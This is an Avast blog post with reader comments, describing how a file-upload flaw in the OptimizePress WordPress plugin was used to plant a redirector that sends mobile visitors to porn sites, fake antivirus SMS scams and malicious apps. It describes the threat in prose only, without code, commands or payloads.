Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

April 17th, 2014

WordPress plugin vulnerability puts mobile visitors at risk

AVAST finds WordPress plugin redirector

AVAST finds new twist on WordPress plugin vulnerability

Today one of our colleagues came into our office and said, “Hey guys, I’ve been infected.” I thought to myself, yeah, how bad can this be? After a bit of digging we found the results were worth it; it turned out to be a really “interesting ” case of mobile redirected threats localized for each country.

All you need is one bad IP

The case was brought to us by Jakub Carda, a fellow AVAST employee who enjoys blogging in his free time. His WordPress site was compromised through a vulnerability in WordPress, more precisely OptimizePress. OptimizePress is a WordPress plugin that fully integrates itself into the WordPress CMS, helping bloggers optimize their blog’s design. A tiny mistake in the code of a file located in: lib/admin/media-upload.php made it possible for pretty much anyone to upload harmful content onto people’s WordPress sites, and plenty of websites have been compromised because of this.

Jakub’s site was compromised by a unique kind of redirector exploiting error in the code. What is unique about this redirector is that it differentiates PC site visitors from mobile users accessing WordPress sites, targeting the mobile visitors only. This, combined with the fact that the code recognizes the mobile user’s location and redirects them to localized pages, makes it interesting. By further inspecting the code we were able to find the IP address that was behind all the trouble:

Ip

Not so pleasant surprise for mobile WordPress site visitors

If you access an infected WordPress site via PC you are safe, but mobile users should watch out. After accessing Jakub’s website with a mobile device (and plenty of other WordPress sites) we were redirected to the root of the problem, an IP address which offered a lot of options in terms of compromising visitor security, including tricking users to pay money, knowingly and unknowingly.

On the server side there was a script that recognized the visitor’s location, and according to that it decided where to redirect the site visitor. We were able to dig up plenty of threats, from multiple websites. Everything from porn sites to fake applications to fake antivirus websites which tried to sneak onto user’s devices. I’ve just randomly picked three to show you which kind of threats await mobile users and sorted them according to their danger level.

  1. Porn sites

No actual harm is done, but it’s quite annoying if you are trying to access a “clean” page to suddenly be redirected to a porn website. You probably won’t be satisfied in this case and it is definitely NSFW.

 

1

Screenshot_2014-04-16-13-17-15

 

Fake anti-virus

This website, which WordPress mobile visitors are redirected to tries to make you to believe that your device is infected and charges you via SMS to “clean” your phone. Luckily there’s still no immediate harm, other than trying to convince you your device is infected and get you to pay for their “service.”

 

6eng

 

Harmful Apps

The third and worst redirect are the porn apps requesting users to install them onto their devices. Although users have to approve the installation before the app can cause the device harm, once installed they are quiet vicious. I’ve analyzed a few of them and found that most contained permissions that were capable of stalking users, sending premium SMS, and even capable of becoming device administrator.

 

Screenshot_2014-04-16-13-18-24

 

Here are some of the other domains the IP address also redirects users to, but as I said, there were plenty more and each localized for different countries.

7 urls

How to protect yourself from the trap

This kind of threat is pretty unique in that it targets mobile users accessing WordPress. As I said at a the beginning, users accessing WordPress from PCs were not effected. This is probably why hackers are using this method, most antivirus companies scan web addresses, making it difficult for them to detect this as the website appears harmless to users accessing it through a PC.

As I write this post, no other antivirus is blocking this IP for their mobile users and the sites it redirects to except for AVAST. avast! Mobile Security blocks this redirect, keeping AVAST users safe. WordPress publishers should delete the file media-upload.php for now and contact either WordPress or OptimizePress for a solution.

 

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun and contest information, please follow us on FacebookTwitter and Google+. Business owners – check out our business products.

 

  1. April 18th, 2014 at 07:47 | #1

    That’s okay, but is it good to call it a WordPress Vulnerability? This is a 3rd party plugin and the vulnerability only lies in it. And why should one contact WordPress when the vulnerability is in a plugin? WordPress.org does not control the content of the plugins.

    I understand that you always want to promote your products. But this? Atleast change the title to “WordPress PLUGIN vulnerability puts mobile visitors at risk” -_-

  2. maximan
    April 21st, 2014 at 12:24 | #2

    Hello!
    Mobiteasy.com is legal mobile affiliate network. No any illegal viruses or same shit on this site. It is the platform for mobile traffic monetization. Our affiliates send their redirects and we send it directly to the mobile offers. All offers are legal and famous!! But they are adult, yes.
    I’ve contacted with avast support to resolve the problem

  3. April 24th, 2014 at 14:48 | #3

    @maximan
    Hello, mobiteasy.com is not blocked anymore. But this malware redirects users there. I’m not saying it’s your fault but users were redirected there without their knowledge.

Comments are closed.